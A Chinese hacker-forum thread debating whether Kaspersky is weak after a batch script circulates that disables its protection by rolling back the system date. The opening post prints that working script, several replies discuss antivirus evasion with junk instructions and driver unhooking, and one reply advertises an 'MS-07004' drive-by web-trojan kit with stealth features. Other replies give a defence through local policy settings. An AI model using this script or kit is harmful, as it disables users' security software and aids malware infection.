[讨论]卡巴真的如此之弱?
[讨论]卡巴真的如此之弱?议题作者:peter_yu
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
最近网上盛传一种终止卡巴防护的代码,更有甚者在病毒中添加了此功能,就是更改系统时间,而其确实也能终止xp下kav的防护,不过可能无法终止当设置权限为不允许更改系统时间时的kav…………
普通脚本代码:
@echo off
set date=%date%
date 1981-01-12
ping -n 45 localhost > nul
date %date%
卡巴竟会犯如此低级的错误?
帖子53 精华[url=http://forum.eviloctal.com/digest.php?authorid=34657]4[/url] 积分3207 阅读权限100 性别男 来自crsky 在线时间99 小时 注册时间2006-2-26 最后登录2008-6-26 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=34657]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=兼职&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]赚更多的钱[/url]
[url=http://forum.eviloctal.com/space-uid-65697.html]剑客留香[/url] [img]http://forum.eviloctal.com/images/avatars/pw/tm1.jpg[/img]
晶莹剔透§烈日灼然 由于卡巴斯基会为了防止盗版,实时检测系统日期,以判断软件是否已经超过授权的使用期限。当发现软件许可过期时会立即关闭所有的监控,同时主程序也无法扫描病毒,并且需要用户输入新的序列号。所以这是没办法的事,一直以来KABA一直如此!
帖子17 精华[url=http://forum.eviloctal.com/digest.php?authorid=65697]0[/url] 积分62 阅读权限40 在线时间13 小时 注册时间2006-10-5 最后登录2007-5-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=65697]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=兼职&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]赚更多的钱[/url]
[url=http://forum.eviloctal.com/space-uid-62767.html]wyf_1009[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 看到小金猪网页上写,可以通过使咔吧的驱动脱钩来实现过主防的目的
不知道这个是怎么实现的。
帖子14 精华[url=http://forum.eviloctal.com/digest.php?authorid=62767]0[/url] 积分33 阅读权限40 性别男 在线时间11 小时 注册时间2006-8-30 最后登录2008-6-9 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=62767]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]
[url=http://forum.eviloctal.com/space-uid-70352.html]my咖啡[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 卡巴的反盗版功能也是他的缺陷,
自己修改下电脑的权限就可以了
在 本地策略—用户权利指派—更改系统时间 里面把所有的帐户都删除
这样这段代码就没有用了.
帖子9 精华[url=http://forum.eviloctal.com/digest.php?authorid=70352]0[/url] 积分34 阅读权限40 在线时间15 小时 注册时间2007-1-11 最后登录2008-6-17 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=70352]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-27818.html]net-owl[/url] [img]http://forum.eviloctal.com/customavatars/27818.jpg[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 楼上的兄弟说的倒是有些意思,利用权限解决问题。
恩,不错当你把不可能变成可能,你会发现你已经被称为高手
[url=http://wpa.qq.com/msgrd?V=1&Uin=121585353&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子158 精华[url=http://forum.eviloctal.com/digest.php?authorid=27818]2[/url] 积分3724 阅读权限100 性别男 来自北京 在线时间19 小时 注册时间2006-1-14 最后登录2008-5-4 [url=http://www.sjr0313.cn/blog]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=27818]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-68889.html]pixy[/url] [img]http://forum.eviloctal.com/customavatars/68889.gif[/img]
荣誉会员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 卡巴已赢的中国市场,再说垃圾,使用人都比较多。
现在是经济时代,经济地位决定政治地位!与狼共舞!
[url=http://wpa.qq.com/msgrd?V=1&Uin=665949&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子395 精华[url=http://forum.eviloctal.com/digest.php?authorid=68889]10[/url] 积分4278 阅读权限100 性别男 来自China 在线时间284 小时 注册时间2007-1-3 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=68889]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘(图)[/url]
[url=http://forum.eviloctal.com/space-uid-83978.html]孤单在湖边[/url] [img]http://forum.eviloctal.com/images/avatars/pw/mon4.gif[/img]
晶莹剔透§烈日灼然 那这样的话不是很容易就可以KILL掉喀吧么...
作为著名的杀毒软件厂商不是很丢人..简洁是智慧的灵魂!!
[url=http://wpa.qq.com/msgrd?V=1&Uin=215662646&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子6 精华[url=http://forum.eviloctal.com/digest.php?authorid=83978]0[/url] 积分23 阅读权限40 性别男 来自⒋ 孤魂野鬼`ヤ 在线时间9 小时 注册时间2007-2-24 最后登录2008-5-25 [url=http://hbguyun.blog.sohu.com]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=83978]查看详细资料[/url]TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]
[url=http://forum.eviloctal.com/space-uid-10367.html]aoshi[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 呵呵 应该所有的产品都是这样 当被大家摸透时就没威胁了
帖子8 精华[url=http://forum.eviloctal.com/digest.php?authorid=10367]0[/url] 积分21 阅读权限40 在线时间50 小时 注册时间2005-8-22 最后登录2008-7-14 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=10367]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-81975.html]叛逆[/url] [img]http://forum.eviloctal.com/images/avatars/pw/unicorn4.gif[/img]
晶莹剔透§烈日灼然 过卡巴表面内存一句花指令就可以过..楼主的这代码可以过主动吧..
帖子6 精华[url=http://forum.eviloctal.com/digest.php?authorid=81975]0[/url] 积分23 阅读权限40 性别男 在线时间8 小时 注册时间2007-2-16 最后登录2007-12-2 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=81975]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-81975.html]叛逆[/url] [img]http://forum.eviloctal.com/images/avatars/pw/unicorn4.gif[/img]
晶莹剔透§烈日灼然 不过卡巴的主动防御要是不用脚本过得了那应该也是高手了吧..
主动防御不错.就喜欢它的主动 [s:39]
帖子6 精华[url=http://forum.eviloctal.com/digest.php?authorid=81975]0[/url] 积分23 阅读权限40 性别男 在线时间8 小时 注册时间2007-2-16 最后登录2007-12-2 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=81975]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-82511.html]gzy21cn[/url] [img]http://forum.eviloctal.com/images/avatars/pw/sky4.gif[/img]
晶莹剔透§烈日灼然 这可能是一个漏洞,但卡巴在其它方面确实比很多杀毒软件强,这是不可否认的事实!
帖子9 精华[url=http://forum.eviloctal.com/digest.php?authorid=82511]0[/url] 积分31 阅读权限40 性别男 在线时间21 小时 注册时间2007-2-18 最后登录2008-7-15 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=82511]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-2798.html]金州[/url] [img]http://forum.eviloctal.com/customavatars/2798.gif[/img]
智囊团成员
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 每种反病毒软件都有其长处,短处。
测试反病毒软件个人感觉主要应该用病毒来测试。
尽量不要用一些木马和一些脚本之类的。
木马和一些远程控制软件异曲同工,有很多机器上有正常的控制软件。
对木马这类的防御更多的不是依靠反病毒软件。而是一些检测判断工具和经验。
关于卡巴的利弊,小小举例一个,
卡巴斯基6.0可以拦截irq中断。这一点会造成一些用户麻烦。甚至在一些电脑上偶然会蓝屏。
但是从另一个角度看,这一点可却说明这个反病毒软件反病毒深度是很强的。
关于反病毒软件,用或者不用,用那一种,罗卜咸菜,各有所爱了。哈哈
不过感觉简单的说它弱,不是很准确。我相信来这里的很多人可能根本不用反病毒软件。或者不大会仅仅依靠反病毒软件。猜测。
以上个人看法。不具权威。:::))人情如冰六月寒,花做一份艳,为谁笑人间?如果任何人发现我转载的有图像的文章中图像失效或者文章有问题,请及时短消息通知我。先谢谢。::)) coup de foudre
帖子1244 精华[url=http://forum.eviloctal.com/digest.php?authorid=2798]8[/url] 积分6154 阅读权限150 性别男 在线时间593 小时 注册时间2005-3-18 最后登录2008-6-6 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=2798]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-46753.html]hanjianshuo[/url] [img]http://forum.eviloctal.com/images/avatars/pw/matrix2.jpg[/img]
晶莹剔透§烈日灼然 卡吧还是比较好用 主动防御真的很不错 其实没有完美的东东的哦
帖子4 精华[url=http://forum.eviloctal.com/digest.php?authorid=46753]0[/url] 积分16 阅读权限40 性别男 在线时间5 小时 注册时间2006-5-1 最后登录2008-3-26 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=46753]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-81975.html]叛逆[/url] [img]http://forum.eviloctal.com/images/avatars/pw/unicorn4.gif[/img]
晶莹剔透§烈日灼然 卡巴对加过冷花指令的杀伤力为0,还没有国内的瑞星强.现在觉得卡巴比不上瑞星..而且性能消耗方面也比不上国产的瑞星..所以..卡巴除了一个主动防御,没有什么好的.(代表我个人观点..)
帖子6 精华[url=http://forum.eviloctal.com/digest.php?authorid=81975]0[/url] 积分23 阅读权限40 性别男 在线时间8 小时 注册时间2007-2-16 最后登录2007-12-2 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=81975]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-71941.html]bearorc[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 卡巴用的人多了,自然它的免杀也会多起来,不过它还是很好用的,修改时间的问题我觉得还是提醒下他们,发封信过去吧...让他们用别的方法反盗版..呵呵
帖子3 精华[url=http://forum.eviloctal.com/digest.php?authorid=71941]0[/url] 积分13 阅读权限40 在线时间0 小时 注册时间2007-1-14 最后登录2007-12-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=71941]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-86508.html]帅得不敢出门[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 瑞星的特征码很难改的 有的是不能改 这个做免杀时定位很简单但要一改程序就不能运行了
这点瑞星还是做的很好 现在其表面查杀功能也变强了
帖子11 精华[url=http://forum.eviloctal.com/digest.php?authorid=86508]0[/url] 积分41 阅读权限40 性别男 在线时间13 小时 注册时间2007-3-4 最后登录2008-3-28 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=86508]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-67784.html]赵子岩[/url]
惟一
[img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 引用:
引用第2楼wyf_1009于2007-02-23 16:48发表的:
看到小金猪网页上写,可以通过使咔吧的驱动脱钩来实现过主防的目的
不知道这个是怎么实现的。
[url=http://xxxxxxxxxx.uu1001.com/read.php?tid=632]http://xxxxxxxxxx.uu1001.com/read.php?tid=632[/url]小金猪 MS-07004网马 V2.0
主要特点
延时申请内存,达到不卡IE 的目的,另外有Cookie鉴别功能
24小时内只中一次,可以确保隐蔽性!
是目前唯一可以在内存128兆计算机下运行的MS-07004网马
本软件仅供测试之用,请不要用于非法途径!
帖子122 精华[url=http://forum.eviloctal.com/digest.php?authorid=67784]2[/url] 积分302 阅读权限40 在线时间63 小时 注册时间2006-10-22 最后登录2008-7-24 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=67784]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-1349.html]Helvin[/url] [img]http://forum.eviloctal.com/customavatars/1349.gif[/img]
团队决策人
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level1.gif[/img] 我装了两次卡巴,两次最终都打不开了。现在用诺顿幸福,那就是……我饿了,看别人手里拿个肉包子,那他就比我幸福;我冷了,看别人穿了一件厚棉袄,他就比我幸福;我想上茅房,就一个坑,你蹲那了,你就比我幸福。
帖子646 精华[url=http://forum.eviloctal.com/digest.php?authorid=1349]22[/url] 积分5001 阅读权限255 在线时间1765 小时 注册时间2005-1-7 最后登录2008-7-23 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=1349]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-87986.html]一挥衣袖[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 这个好像脱离了杀软的强弱的讨论范围了,不过卡巴似乎也应该加强对这方面的恶意利用的防范了。
帖子4 精华[url=http://forum.eviloctal.com/digest.php?authorid=87986]0[/url] 积分16 阅读权限40 性别男 在线时间6 小时 注册时间2007-3-7 最后登录2008-5-15 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=87986]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-75677.html]sixiang[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 最不爽是玩游戏时候。监控太强。
帖子1 精华[url=http://forum.eviloctal.com/digest.php?authorid=75677]0[/url] 积分6 阅读权限40 性别男 在线时间7 小时 注册时间2007-1-29 最后登录2008-6-3 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=75677]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-81426.html]lalaliu[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 卡巴已赢的中国市场,再说垃圾,使用人都比较多。
现在是经济时代,经济地位决定政治地位!一点都不错
帖子1 精华[url=http://forum.eviloctal.com/digest.php?authorid=81426]0[/url] 积分6 阅读权限40 在线时间0 小时 注册时间2007-2-14 最后登录2008-2-24 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=81426]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-79274.html]fishcpu[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 我现在用的是nod,感觉比卡巴好用
帖子2 精华[url=http://forum.eviloctal.com/digest.php?authorid=79274]0[/url] 积分9 阅读权限40 在线时间1 小时 注册时间2007-2-9 最后登录2007-3-9 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=79274]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-25845.html]yongmin[/url] [img]http://forum.eviloctal.com/images/avatars/pw/tm3.jpg[/img]
晶莹剔透§烈日灼然 卡巴的主动防御不错啊。即使有这样的漏洞,可以再加个ssm这样就可以双重保护你的电脑。
帖子12 精华[url=http://forum.eviloctal.com/digest.php?authorid=25845]0[/url] 积分38 阅读权限40 性别男 在线时间96 小时 注册时间2006-1-4 最后登录2008-7-23 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=25845]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-86561.html]376497571[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然 越是出名用的人多几越被人搞破坏,vista的盗版问题是个典型案例(比以往的操作系统出现盗版时间周期最短)
帖子3 精华[url=http://forum.eviloctal.com/digest.php?authorid=86561]0[/url] 积分16 阅读权限40 性别男 在线时间9 小时 注册时间2007-3-4 最后登录2008-1-23 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=86561]查看详细资料[/url]TOP
[url=http://forum.eviloctal.com/space-uid-72854.html]mike81fang[/url] [img]http://forum.eviloctal.com/images/avatars/pw/matrix4.jpg[/img]
晶莹剔透§烈日灼然 呵呵。{:Yem71:Y} 呵呵。{:Yem71:Y}
页:
[1]